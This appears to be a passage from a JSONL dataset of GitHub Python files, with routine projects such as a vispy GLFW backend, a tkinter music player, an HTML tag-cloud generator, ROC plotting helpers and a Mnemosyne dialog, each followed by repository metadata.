keys.LEFT,\n glfw.GLFW_KEY_UP: keys.UP,\n glfw.GLFW_KEY_RIGHT: keys.RIGHT,\n glfw.GLFW_KEY_DOWN: keys.DOWN,\n glfw.GLFW_KEY_PAGE_UP: keys.PAGEUP,\n glfw.GLFW_KEY_PAGE_DOWN: keys.PAGEDOWN,\n\n glfw.GLFW_KEY_INSERT: keys.INSERT,\n glfw.GLFW_KEY_DELETE: keys.DELETE,\n glfw.GLFW_KEY_HOME: keys.HOME,\n glfw.GLFW_KEY_END: keys.END,\n\n glfw.GLFW_KEY_ESCAPE: keys.ESCAPE,\n glfw.GLFW_KEY_BACKSPACE: keys.BACKSPACE,\n\n glfw.GLFW_KEY_F1: keys.F1,\n glfw.GLFW_KEY_F2: keys.F2,\n glfw.GLFW_KEY_F3: keys.F3,\n glfw.GLFW_KEY_F4: keys.F4,\n glfw.GLFW_KEY_F5: keys.F5,\n glfw.GLFW_KEY_F6: keys.F6,\n glfw.GLFW_KEY_F7: keys.F7,\n glfw.GLFW_KEY_F8: keys.F8,\n glfw.GLFW_KEY_F9: keys.F9,\n glfw.GLFW_KEY_F10: keys.F10,\n glfw.GLFW_KEY_F11: keys.F11,\n glfw.GLFW_KEY_F12: keys.F12,\n\n glfw.GLFW_KEY_SPACE: keys.SPACE,\n glfw.GLFW_KEY_ENTER: keys.ENTER,\n '\\r': keys.ENTER,\n glfw.GLFW_KEY_TAB: keys.TAB,\n }\n\n BUTTONMAP = {glfw.GLFW_MOUSE_BUTTON_LEFT: 1,\n glfw.GLFW_MOUSE_BUTTON_RIGHT: 2,\n glfw.GLFW_MOUSE_BUTTON_MIDDLE: 3\n }\nexcept Exception as exp:\n available, testable, why_not, which = False, False, str(exp), None\nelse:\n if USE_EGL:\n available, testable, why_not = False, False, 'EGL not supported'\n which = 'glfw ' + str(glfw.__version__)\n else:\n available, testable, why_not = True, True, None\n which = 'glfw ' + str(glfw.__version__)\n\nMOD_KEYS = [keys.SHIFT, keys.ALT, keys.CONTROL, keys.META]\n_GLFW_INITIALIZED = False\n_VP_GLFW_ALL_WINDOWS = []\n\n\ndef _get_glfw_windows():\n wins = list()\n for win in _VP_GLFW_ALL_WINDOWS:\n if isinstance(win, CanvasBackend):\n wins.append(win)\n return wins\n\n\n# -------------------------------------------------------------- capability ---\n\ncapability = dict( # things that can be set by the backend\n title=True,\n size=True,\n position=True,\n show=True,\n vsync=True,\n resizable=True,\n decorate=True,\n fullscreen=True,\n context=True,\n multi_window=True,\n scroll=True,\n parent=False,\n always_on_top=True,\n)\n\n\n# ------------------------------------------------------- set_configuration ---\n\ndef _set_config(c):\n \"\"\"Set gl configuration for GLFW \"\"\"\n glfw.glfwWindowHint(glfw.GLFW_RED_BITS, c['red_size'])\n glfw.glfwWindowHint(glfw.GLFW_GREEN_BITS, c['green_size'])\n glfw.glfwWindowHint(glfw.GLFW_BLUE_BITS, c['blue_size'])\n glfw.glfwWindowHint(glfw.GLFW_ALPHA_BITS, c['alpha_size'])\n\n glfw.glfwWindowHint(glfw.GLFW_ACCUM_RED_BITS, 0)\n glfw.glfwWindowHint(glfw.GLFW_ACCUM_GREEN_BITS, 0)\n glfw.glfwWindowHint(glfw.GLFW_ACCUM_BLUE_BITS, 0)\n glfw.glfwWindowHint(glfw.GLFW_ACCUM_ALPHA_BITS, 0)\n\n glfw.glfwWindowHint(glfw.GLFW_DEPTH_BITS, c['depth_size'])\n glfw.glfwWindowHint(glfw.GLFW_STENCIL_BITS, c['stencil_size'])\n # glfw.glfwWindowHint(glfw.GLFW_CONTEXT_VERSION_MAJOR, c['major_version'])\n # glfw.glfwWindowHint(glfw.GLFW_CONTEXT_VERSION_MINOR, c['minor_version'])\n # glfw.glfwWindowHint(glfw.GLFW_SRGB_CAPABLE, c['srgb'])\n glfw.glfwWindowHint(glfw.GLFW_SAMPLES, c['samples'])\n glfw.glfwWindowHint(glfw.GLFW_STEREO, c['stereo'])\n if not c['double_buffer']:\n raise RuntimeError('GLFW must double buffer, consider using a '\n 'different backend, or using double buffering')\n\n\n# ------------------------------------------------------------- application ---\n\n\n_glfw_errors = []\n\n\ndef _error_callback(num, descr):\n _glfw_errors.append('Error %s: %s' % (num, descr))\n\n\nclass ApplicationBackend(BaseApplicationBackend):\n\n def __init__(self):\n BaseApplicationBackend.__init__(self)\n self._timers = list()\n\n def _add_timer(self, timer):\n if timer not in self._timers:\n self._timers.append(timer)\n\n def _vispy_get_backend_name(self):\n return 'Glfw'\n\n def _vispy_process_events(self):\n glfw.glfwPollEvents()\n for timer in self._timers:\n timer._tick()\n wins = _get_glfw_windows()\n for win in wins:\n if win._needs_draw:\n win._needs_draw = False\n win._on_draw()\n\n def _vispy_run(self):\n wins = _get_glfw_windows()\n while any(w._id is not None and not glfw.glfwWindowShouldClose(w._id)\n for w in wins):\n self._vispy_process_events()\n self._vispy_quit() # to clean up\n\n def _vispy_quit(self):\n # Close windows\n wins = _get_glfw_windows()\n for win in wins:\n if win._vispy_canvas is not None:\n win._vispy_canvas.close()\n # tear down timers\n for timer in self._timers:\n timer._vispy_stop()\n self._timers = []\n\n def _vispy_get_native_app(self):\n global _GLFW_INITIALIZED\n if not _GLFW_INITIALIZED:\n cwd = os.getcwd()\n glfw.glfwSetErrorCallback(_error_callback)\n try:\n if not glfw.glfwInit(): # only ever call once\n raise OSError('Could not init glfw:\\n%r' % _glfw_errors)\n finally:\n os.chdir(cwd)\n glfw.glfwSetErrorCallback(0)\n atexit.register(glfw.glfwTerminate)\n _GLFW_INITIALIZED = True\n return glfw\n\n\n# ------------------------------------------------------------------ canvas ---\n\nclass CanvasBackend(BaseCanvasBackend):\n\n \"\"\" Glfw backend for Canvas abstract class.\"\"\"\n\n # args are for BaseCanvasBackend, kwargs are for us.\n def __init__(self, *args, **kwargs):\n BaseCanvasBackend.__init__(self, *args)\n p = self._process_backend_kwargs(kwargs)\n self._initialized = False\n\n # Deal with config\n _set_config(p.context.config)\n # Deal with context\n p.context.shared.add_ref('glfw', self)\n if p.context.shared.ref is self:\n share = None\n else:\n share = p.context.shared.ref._id\n\n glfw.glfwWindowHint(glfw.GLFW_REFRESH_RATE, 0) # highest possible\n glfw.glfwSwapInterval(1 if p.vsync else 0)\n glfw.glfwWindowHint(glfw.GLFW_RESIZABLE, int(p.resizable))\n glfw.glfwWindowHint(glfw.GLFW_DECORATED, int(p.decorate))\n glfw.glfwWindowHint(glfw.GLFW_VISIBLE, 0) # start out hidden\n glfw.glfwWindowHint(glfw.GLFW_FLOATING, int(p.always_on_top))\n if p.fullscreen is not False:\n self._fullscreen = True\n if p.fullscreen is True:\n monitor = glfw.glfwGetPrimaryMonitor()\n else:\n monitor = glfw.glfwGetMonitors()\n if p.fullscreen >= len(monitor):\n raise ValueError('fullscreen must be <= %s'\n % len(monitor))\n monitor = monitor[p.fullscreen]\n use_size = glfw.glfwGetVideoMode(monitor)[:2]\n if use_size != tuple(p.size):\n logger.debug('Requested size %s, will be ignored to '\n 'use fullscreen mode %s' % (p.size, use_size))\n size = use_size\n else:\n self._fullscreen = False\n monitor = None\n size = p.size\n\n self._id = glfw.glfwCreateWindow(width=size[0], height=size[1],\n title=p.title, monitor=monitor,\n share=share)\n if not self._id:\n raise RuntimeError('Could not create window')\n\n _VP_GLFW_ALL_WINDOWS.append(self)\n self._mod = list()\n\n # Register callbacks\n glfw.glfwSetWindowRefreshCallback(self._id, self._on_draw)\n glfw.glfwSetWindowSizeCallback(self._id, self._on_resize)\n glfw.glfwSetKeyCallback(self._id, self._on_key_press)\n glfw.glfwSetCharCallback(self._id, self._on_key_char)\n glfw.glfwSetMouseButtonCallback(self._id, self._on_mouse_button)\n glfw.glfwSetScrollCallback(self._id, self._on_mouse_scroll)\n glfw.glfwSetCursorPosCallback(self._id, self._on_mouse_motion)\n glfw.glfwSetWindowCloseCallback(self._id, self._on_close)\n self._vispy_canvas_ = None\n self._needs_draw = False\n self._vispy_canvas.set_current()\n if p.position is not None:\n self._vispy_set_position(*p.position)\n if p.show:\n glfw.glfwShowWindow(self._id)\n\n # Init\n self._initialized = True\n self._next_key_events = []\n self._next_key_text = {}\n self._vispy_canvas.set_current()\n self._vispy_canvas.events.initialize()\n\n def _vispy_warmup(self):\n etime = time() + 0.25\n while time() < etime:\n sleep(0.01)\n self._vispy_canvas.set_current()\n self._vispy_canvas.app.process_events()\n\n def _vispy_set_current(self):\n if self._id is None:\n return\n # Make this the current context\n glfw.glfwMakeContextCurrent(self._id)\n\n def _vispy_swap_buffers(self):\n if self._id is None:\n return\n # Swap front and back buffer\n glfw.glfwSwapBuffers(self._id)\n\n def _vispy_set_title(self, title):\n if self._id is None:\n return\n # Set the window title. Has no effect for widgets\n glfw.glfwSetWindowTitle(self._id, title)\n\n def _vispy_set_size(self, w, h):\n if self._id is None:\n return\n # Set size of the widget or window\n glfw.glfwSetWindowSize(self._id, w, h)\n\n def _vispy_set_position(self, x, y):\n if self._id is None:\n return\n # Set position of the widget or window. May have no effect for widgets\n glfw.glfwSetWindowPos(self._id, x, y)\n\n def _vispy_set_visible(self, visible):\n # Show or hide the window or widget\n if self._id is None:\n return\n if visible:\n glfw.glfwShowWindow(self._id)\n # this ensures that the show takes effect\n self._vispy_update()\n else:\n glfw.glfwHideWindow(self._id)\n\n def _vispy_set_fullscreen(self, fullscreen):\n logger.warn('Cannot change fullscreen mode for GLFW backend')\n\n def _vispy_update(self):\n # Invoke a redraw, passing it on to the canvas\n if self._vispy_canvas is None or self._id is None:\n return\n # Mark that this window wants to be drawn on the next loop iter\n self._needs_draw = True\n\n def _vispy_close(self):\n # Force the window or widget to shut down\n if self._id is not None:\n self._vispy_canvas = None\n # glfw.glfwSetWindowShouldClose() # Does not really cause a close\n self._vispy_set_visible(False)\n self._id, id_ = None, self._id\n glfw.glfwDestroyWindow(id_)\n gc.collect() # help ensure context gets destroyed\n\n def _vispy_get_size(self):\n if self._id is None:\n return\n w, h = glfw.glfwGetWindowSize(self._id)\n return w, h\n\n def _vispy_get_physical_size(self):\n if self._id is None:\n return\n w, h = glfw.glfwGetFramebufferSize(self._id)\n return w, h\n\n def _vispy_get_position(self):\n if self._id is None:\n return\n x, y = glfw.glfwGetWindowPos(self._id)\n return x, y\n\n def _vispy_get_fullscreen(self):\n return self._fullscreen\n\n ##########################################\n # Notify vispy of events triggered by GLFW\n def _on_resize(self, _id, w, h):\n if self._vispy_canvas is None:\n return\n self._vispy_canvas.events.resize(\n size=(w, h), physical_size=self._vispy_get_physical_size())\n\n def _on_close(self, _id):\n if self._vispy_canvas is None:\n return\n self._vispy_canvas.close()\n\n def _on_draw(self, _id=None):\n if self._vispy_canvas is None or self._id is None:\n return\n self._vispy_canvas.set_current()\n self._vispy_canvas.events.draw(region=None) # (0, 0, w, h))\n\n def _on_mouse_button(self, _id, button, action, mod):\n if self._vispy_canvas is None and self._id is not None:\n return\n pos = glfw.glfwGetCursorPos(self._id)\n if button < 3:\n # Mouse click event\n button = BUTTONMAP.get(button, 0)\n if action == glfw.GLFW_PRESS:\n fun = self._vispy_mouse_press\n elif action == glfw.GLFW_RELEASE:\n fun = self._vispy_mouse_release\n else:\n return\n fun(pos=pos, button=button, modifiers=self._mod)\n\n def _on_mouse_scroll(self, _id, x_off, y_off):\n if self._vispy_canvas is None and self._id is not None:\n return\n pos = glfw.glfwGetCursorPos(self._id)\n delta = (float(x_off), float(y_off))\n self._vispy_canvas.events.mouse_wheel(pos=pos, delta=delta,\n modifiers=self._mod)\n\n def _on_mouse_motion(self, _id, x, y):\n if self._vispy_canvas is None:\n return\n self._vispy_mouse_move(pos=(x, y), modifiers=self._mod)\n\n def _on_key_press(self, _id, key, scancode, action, mod):\n if self._vispy_canvas is None:\n return\n key, text = self._process_key(key)\n if action == glfw.GLFW_PRESS:\n fun = self._vispy_canvas.events.key_press\n down = True\n elif action == glfw.GLFW_RELEASE:\n fun = self._vispy_canvas.events.key_release\n down = False\n else:\n return\n self._process_mod(key, down=down)\n \n # NOTE: GLFW only provides localized characters via _on_key_char, so if\n # this event contains a character we store all other data and dispatch\n # it once the final unicode character is sent shortly after.\n if text != '' and action == glfw.GLFW_PRESS:\n self._next_key_events.append((fun, key, self._mod))\n else:\n if key in self._next_key_text:\n text = self._next_key_text[key]\n del self._next_key_text[key]\n fun(key=key, text=text, modifiers=self._mod)\n\n def _on_key_char(self, _id, text):\n # Repeat strokes (frequency configured at OS) are sent here only,\n # no regular _on_key_press events. Currently ignored!\n if len(self._next_key_events) == 0:\n return\n\n (fun, key, mod) = self._next_key_events.pop(0)\n fun(key=key, text=chr(text), modifiers=mod)\n self._next_key_text[key] = text\n\n def _process_key(self, key):\n if 32 <= key <= 127:\n return keys.Key(chr(key)), chr(key)\n elif key in KEYMAP:\n return KEYMAP[key], ''\n else:\n return None, ''\n\n def _process_mod(self, key, down):\n \"\"\"Process (possible) keyboard modifiers\n\n GLFW provides \"mod\" with many callbacks, but not (critically) the\n scroll callback, so we keep track on our own here.\n \"\"\"\n if key in MOD_KEYS:\n if down:\n if key not in self._mod:\n self._mod.append(key)\n elif key in self._mod:\n self._mod.pop(self._mod.index(key))\n return self._mod\n\n\n# ------------------------------------------------------------------- timer ---\n\nclass TimerBackend(BaseTimerBackend):\n\n def __init__(self, vispy_timer):\n BaseTimerBackend.__init__(self, vispy_timer)\n vispy_timer._app._backend._add_timer(self)\n self._vispy_stop()\n\n def _vispy_start(self, interval):\n self._interval = interval\n self._next_time = time() + self._interval\n\n def _vispy_stop(self):\n self._next_time = float('inf')\n\n def _tick(self):\n if time() >= self._next_time:\n self._vispy_timer._timeout()\n self._next_time = time() + self._interval\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/vispy_vispy/vispy-master/vispy/app/backends/_glfw.py","file_name":"_glfw.py","file_ext":"py","file_size_in_byte":16909,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"40172500655","text":"\ndef input_choice():\n print('0. Exit')\n print('1. Add user')\n print('2. Remove user')\n print('3. List users')\n\n return input('Choose a choice: ')\n\n\ndef add_user(users):\n user = input('Enter user: ')\n users.append(user)\n print(f'Added {user}')\n\ndef remove_user(users):\n user = input('Enter user: ')\n if user in users:\n users.remove(user)\n else:\n print(f'{user} not found')\n\ndef list_users(users):\n if len(users) == 0:\n print('No users')\n else:\n list = (sorted(users))\n print('List of users: ')\n for user in list:\n print(' - ' + user)\n\ndef read_user_from_file():\n with open('users.txt', 'r') as file:\n usersFromFile = file.readlines()\n users = [user.rstrip('\\n') for user in usersFromFile]\n\n return users\n\ndef write_user_to_file(users):\n with open('users.txt', 'w') as file:\n file.writelines([user + '\\n' for user in users])\n\n\n\n","repo_name":"SergLavrov/SpisokPeopleProject-File14.08","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33043481666","text":"'''\r\n Class responsible for creating HTML file for\r\n word_count_gen.py.\r\n'''\r\n\r\nclass MarkupParser():\r\n\r\n ##########\r\n ## INIT ##\r\n ##########\r\n\r\n '''\r\n @desc\r\n Initialization for MarkupParser.\r\n @param html\r\n String path to output html file.\r\n @param text\r\n String path to input txt file.\r\n @param words_dict\r\n Dictonary holding word counts.\r\n @param maximum\r\n Int current maximum count.\r\n @param minimum\r\n Int current minimum count.\r\n @param length\r\n Int number of terms to use in Tag Gen.\r\n '''\r\n def __init__(self, html, text, words_dict, maximum, minimum, length):\r\n self.html = html\r\n self.text = text\r\n self.words_dict = dict(words_dict)\r\n self.maximum = maximum\r\n self.minimum = minimum\r\n self.length = length\r\n\r\n ##############\r\n ## INSTANCE ##\r\n ##############\r\n\r\n '''\r\n @desc\r\n Util method for calculating the appropriate class-font size for a given count,\r\n assuming the current max and min of the data set.\r\n @param x\r\n Int number of occurances of a word.\r\n @return\r\n Int class-font size to use in HTML.\r\n '''\r\n def get_font_size(self, x):\r\n new_max = 11\r\n new_min = 48\r\n size = new_min\r\n if not self.maximum == self.minimum:\r\n size = (new_max - new_min)*(x - self.minimum)/(self.maximum - self.minimum) + new_min\r\n return int(size)\r\n\r\n '''\r\n @desc\r\n Creates insides of \r\n @param sample\r\n File .html that is open.\r\n '''\r\n def create_head(self, sample):\r\n css = \"http://web.cse.ohio-state.edu/software/2231/\"\r\n css += \"web-sw2/assignments/projects/tag-cloud-generator/data/tagcloud.css\"\r\n sample.write(\"Top \" + str(self.length) + \" words in \" + self.text + \"\\n\")\r\n sample.write('\\n')\r\n\r\n '''\r\n @desc\r\n Creates insides of \r\n @param sample\r\n File .html that is open.\r\n '''\r\n def create_body(self, sample):\r\n sample.write(\"

    Top \" + str(self.length) + \" words in \" + self.text + \"

    \\n\")\r\n sample.write(\"
    \\n\")\r\n sample.write('
    \\n')\r\n sample.write('

    \\n')\r\n for key in self.words_dict:\r\n font = str(self.get_font_size(self.words_dict.get(key)))\r\n sample.write('' +key+ '\\n')\r\n sample.write(\"

    \\n\")\r\n sample.write(\"
    \\n\")\r\n\r\n '''\r\n @desc\r\n Creates .html file.\r\n '''\r\n def create_html(self):\r\n with open(self.html, 'w') as sample:\r\n sample.write(\"\\n\")\r\n sample.write(\"\\n\")\r\n self.create_head(sample)\r\n sample.write(\"\\n\")\r\n sample.write(\"\\n\")\r\n self.create_body(sample)\r\n sample.write(\"\\n\")\r\n sample.write(\"\\n\")\r\n","repo_name":"corey-miles/Python-Projects","sub_path":"word_count_gen/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14564012781","text":"import pygame\nimport tkinter as tk\nfrom tkinter import ttk\n\nclass MusicPlayer:\n def __init__(self):\n # Define a list of song names and paths\n self.songs = [\n {\"name\": \"Piano\", \"path\": 'D:\\music\\soft-piano-100-bpm-121529.mp3'},\n {\"name\": \"Battle\", \"path\": 'D:\\music\\epic_battle_music_1-6275.mp3'},\n {\"name\": \"Dark\", \"path\": 'D:\\music\\dark-background-sounds-52324.mp3'},\n {\"name\": \"ANNOYING\", \"path\": 'D:\\music\\cottagecore-17463.mp3'},\n {\"name\": \"Tata\", \"path\": r'D:\\music\\taratata-6264.mp3'},\n {\"name\": \"Letsgo\", \"path\": 'D:\\music\\gamemusic-6082.mp3'},\n {\"name\": \"cyber-town\", \"path\": 'D:\\music\\cyber-town-simcity-style-music-22907.mp3'},\n {\"name\": \"rar\", \"path\": r'D:\\music\\1-soundtrack-18034.mp3'},\n {\"name\": \"spookyy\", \"path\": r'D:\\music\\spooky-halloween-effects-with-thunder-121665.mp3'},\n {\"name\": \"stop music\", \"path\": 'D:\\music\\infinitely-loud-silence-ils-74283.mp3'},\n # Add more songs here\n ]\n\n # Initialize Pygame\n pygame.init()\n\n # Create the GUI window\n self.root = tk.Tk()\n self.root.title(\"Music Player\")\n\n # Create the listbox to display the songs\n self.listbox = tk.Listbox(self.root,fg=\"green\",bg=\"black\",selectbackground=\"gray\",selectforeground=\"black\")\n self.listbox.pack()\n\n # Populate the listbox with the song names\n for song in self.songs:\n self.listbox.insert(\"end\", song[\"name\"])\n\n\n # Create a play button\n self.play_button = tk.Button(self.root, text=\"Play\", command=self.play_song)\n self.play_button.pack()\n\n # Function to play the selected song\n def play_song(self):\n selected_song = self.listbox.get(self.listbox.curselection())\n for song in self.songs:\n if song[\"name\"] == selected_song:\n pygame.mixer.music.load(song[\"path\"])\n pygame.mixer.music.play()\n\n # Start the GUI event loop\n def run(self):\n self.root.mainloop()\n","repo_name":"Doridondon25/project-snake","sub_path":"venv/ab/final/music_player.py","file_name":"music_player.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35485729883","text":"import matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom Masters.PRDrag.EvolvePRe import *\n\n\ndef ringPR(a,e,Tini):\n Tyears=10**8.\n TimeStep=100\n plt.figure()\n\n F = np.linspace(0, 2 * pi, 1000)\n # Plotting 1\n colours = cm.rainbow(np.linspace(0, 1, 5))\n R1 = npr(a, e, F)\n plt.polar(F, R1 / au, label='initial')\n for i in range(-2,2):\n Rfrag=10**i\n (Data, Tmini)=PREvolve(a,e,Tyears,Tini,Rfrag)\n T=np.size(Data[0,:])-1\n for t in range(0,T+1):\n RelativeAngle='isthisevenneeded'\n\n for t in (0,4): #range(0,5)\n Timeshow=int(T*(10**-t))\n R1 = npr(Data[1,Timeshow], Data[2,Timeshow], F)\n plt.polar(F,R1/au,label='Rfrag=10^%s, T=10^%s'%(i,6-t), color=colours[t])\n\n\n\n plt.legend()\n\n # plt.loglog([1,Tyears],[10**3.,10**3.], label='Km')\n\n\n plt.show()\n print('finished graphing')\n return\n\n#changeperorbit(5e9,2.5*au,0.995)\n#ringdispresion(2.1*au,0.995,10**7.,0.5e9)\nringPR(2.5 * au, 0.995, 0.5e9)\n#GraphPrEvolve(2.5*au,0.995,10**8,0.5e9)\n\n'''\n Angle=np.zeros((1,T+1))\n for t in range(0,T+1):\n Angle\n '''","repo_name":"TomMCallingham/SpaggetiAstro","sub_path":"Masters/DynamicalEvof1Disc/RingEvol.py","file_name":"RingEvol.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25150427171","text":"from setuptools import setup, find_packages\n\nimport os\nimport sys\n\nversion_file_path = os.path.join(\n\tos.path.dirname(os.path.abspath(__file__)),\n\t\"nlutestframework\",\n\t\"version.py\"\n)\n\nversion = {}\nwith open(version_file_path) as f:\n\texec(f.read(), version)\nversion = version[\"__version__\"]\n\nwith open(\"README.md\") as f:\n long_description = f.read()\n\nsetup(\n name = \"NLUTestFramework\",\n version = version,\n description = \"A framework to benchmark and compare NLU frameworks.\",\n long_description = long_description,\n long_description_content_type = \"text/markdown\",\n url = \"https://github.com/emundo/nlutestframework\",\n author = \"Tim Henkes\",\n author_email = \"emubot@e-mundo.de\",\n license = \"Apache 2.0\",\n packages = find_packages(),\n entry_points = {\n \"console_scripts\": [\n \"nlutestframework=nlutestframework.__main__:main\"\n ],\n },\n install_requires = [\n \"snips-nlu>=0.20.0,<0.21\",\n \"dialogflow>=0.7.2,<0.8\",\n \"docker>=4.1.0,<5\",\n \"requests>=2.22,<3\",\n \"matplotlib>=3.1.2,<4\",\n \"pyyaml>=5.1.2,<6\",\n \"azure-cognitiveservices-language-luis>=0.5.0,<0.6\",\n \"langcodes>=1.4.1,<2\"\n ],\n python_requires = \">=3.7, <4\",\n zip_safe = False,\n classifiers = [\n \"Development Status :: 4 - Beta\",\n\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Education\",\n \"Intended Audience :: Information Technology\",\n \"Intended Audience :: Science/Research\",\n \"Intended Audience :: Telecommunications Industry\",\n\n \"Topic :: Communications :: Chat\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n \"Topic :: Scientific/Engineering :: Human Machine Interfaces\",\n\n \"License :: OSI Approved :: Apache Software License\",\n\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\"\n ]\n)\n","repo_name":"emundo/nlutestframework","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33353573933","text":"from itertools import cycle\n\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\n\n\ndef roc_from_predictions(y_score, y, title='Some extension of Receiver operating characteristic to multi-class',\n labels=None, lw=2):\n \"\"\"\n This function builds ROC curve from model predictions.\n - y_score - model class predictions (as numpy array)\n - y - one-hot encoded ground truth (as numpy array)\n - labels - class labels\n - lw - plot's line width\n \"\"\"\n\n n_classes = y.shape[1]\n\n _roc(n_classes, y_score, y, title, labels, lw)\n\n\ndef roc_from_keras_model(compiled_model, x, y,\n title='Some extension of Receiver operating characteristic to multi-class', labels=None, lw=2):\n \"\"\"\n This function builds ROC curve from the Keras classification model.\n - compiled_model is a keras model\n - x - dataset\n - y - one-hot encoded ground truth (as numpy array)\n - labels - class labels\n - lw - plot's line width\n \"\"\"\n\n n_classes = y.shape[1]\n y_score = compiled_model.predict(x)\n\n _roc(n_classes, y_score, y, title, labels, lw)\n\n\ndef _roc(n_classes: int, y_score, y, title: str, labels=None, lw=2):\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n for i in range(n_classes):\n fpr[i], tpr[i], _ = roc_curve(y[:, i], y_score[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y.ravel(), y_score.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n # Plot all ROC curves\n plt.figure(1)\n\n _plot(fpr, tpr, roc_auc, n_classes, labels, title, lw)\n\n\ndef _plot(fpr, tpr, roc_auc, n_classes, labels, title, lw):\n plt.plot(fpr[\"micro\"], tpr[\"micro\"],\n label='micro-average ROC curve (area = {0:0.2f})'\n ''.format(roc_auc[\"micro\"]),\n color='deeppink', linestyle=':', linewidth=4)\n colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])\n for i, color in zip(range(n_classes), colors):\n plt.plot(fpr[i], tpr[i], color=color, lw=lw,\n label='ROC curve of class {0} (area = {1:0.2f})'\n ''.format(labels[i] if labels is not None else i, roc_auc[i]))\n\n plt.plot([0, 1], [0, 1], 'k--', lw=lw)\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title(title)\n plt.legend(loc=\"lower right\")\n plt.show()\n","repo_name":"CElabls/python-roc","sub_path":"python_roc/roc.py","file_name":"roc.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2021261019","text":"#\r\n# manage_card_types_dlg.py \r\n#\r\n\r\nfrom PyQt6 import QtCore, QtGui, QtWidgets\r\n\r\nfrom mnemosyne.libmnemosyne.gui_translator import _\r\nfrom mnemosyne.libmnemosyne.card_type import CardType\r\nfrom mnemosyne.pyqt_ui.card_type_language_list_wdgt import \\\r\n CardTypeLanguageListWdgt\r\nfrom mnemosyne.pyqt_ui.clone_card_type_dlg import CloneCardTypeDlg\r\nfrom mnemosyne.pyqt_ui.ui_manage_card_types_dlg import Ui_ManageCardTypesDlg\r\nfrom mnemosyne.pyqt_ui.edit_M_sided_card_type_dlg import EditMSidedCardTypeDlg\r\nfrom mnemosyne.libmnemosyne.ui_components.dialogs import ManageCardTypesDialog\r\n\r\n\r\nclass ManageCardTypesDlg(QtWidgets.QDialog, ManageCardTypesDialog,\r\n Ui_ManageCardTypesDlg):\r\n\r\n def __init__(self, **kwds):\r\n super().__init__(**kwds)\r\n self.setupUi(self)\r\n self.native_card_types = CardTypeLanguageListWdgt(\\\r\n parent=self.native_card_types_box,\r\n component_manager=self.component_manager)\r\n self.vertical_layout_native_card_types.insertWidget(\\\r\n 0, self.native_card_types)\r\n self.Anki_card_types = CardTypeLanguageListWdgt(\\\r\n parent=self.Anki_card_types_box,\r\n component_manager=self.component_manager)\r\n self.vertical_layout_Anki_card_types.insertWidget(\\\r\n 0, self.Anki_card_types)\r\n self.setWindowFlags(self.windowFlags() \\\r\n | QtCore.Qt.WindowType.WindowMinMaxButtonsHint)\r\n self.setWindowFlags(self.windowFlags() \\\r\n & ~ QtCore.Qt.WindowType.WindowContextHelpButtonHint)\r\n self.update()\r\n state = self.config()[\"manage_card_types_dlg_state\"]\r\n if state:\r\n self.restoreGeometry(state)\r\n\r\n def activate(self):\r\n ManageCardTypesDialog.activate(self)\r\n self.exec()\r\n\r\n def update(self):\r\n # Fill up native types panel.\r\n card_types = []\r\n for card_type in self.database().sorted_card_types():\r\n if not card_type.hidden_from_UI and \\\r\n not card_type.id.startswith(\"7\"):\r\n card_types.append(card_type)\r\n self.native_card_types.set_card_types(card_types)\r\n self.rename_native_card_type_button.setEnabled(False)\r\n self.delete_native_card_type_button.setEnabled(False)\r\n self.native_card_types.selectionModel().currentRowChanged.connect(\\\r\n self.activate_native_card_type)\r\n # Fill up Anki card types panel.\r\n card_types = []\r\n for card_type in self.database().sorted_card_types():\r\n if self.database().is_user_card_type(card_type) and \\\r\n not card_type.hidden_from_UI and \\\r\n card_type.id.startswith(\"7\"):\r\n card_types.append(card_type)\r\n self.Anki_card_types.set_card_types(card_types)\r\n self.edit_Anki_card_type_button.setEnabled(False)\r\n self.rename_Anki_card_type_button.setEnabled(False)\r\n self.delete_Anki_card_type_button.setEnabled(False)\r\n self.Anki_card_types.selectionModel().currentRowChanged.connect(\\\r\n self.activate_Anki_card_type)\r\n if len(card_types) == 0:\r\n self.Anki_card_types_box.hide()\r\n else:\r\n self.native_card_types_box.setTitle(_(\"Mnemosyne card types\"))\r\n\r\n def clone_card_type(self):\r\n if not self.config()[\"clone_help_shown\"]:\r\n self.main_widget().show_information(\\\r\n_(\"Here, you can make clones of existing card types. This allows you to format cards in this type independently from cards in the original type. E.g. you can make a clone of 'Vocabulary', call it 'Thai' and set a Thai font specifically for this card type without disturbing your other cards.\"))\r\n self.config()[\"clone_help_shown\"] = True\r\n dlg = CloneCardTypeDlg(parent=self, component_manager=self.component_manager)\r\n dlg.exec()\r\n self.update()\r\n\r\n def activate_native_card_type(self):\r\n self.rename_native_card_type_button.setEnabled(True)\r\n 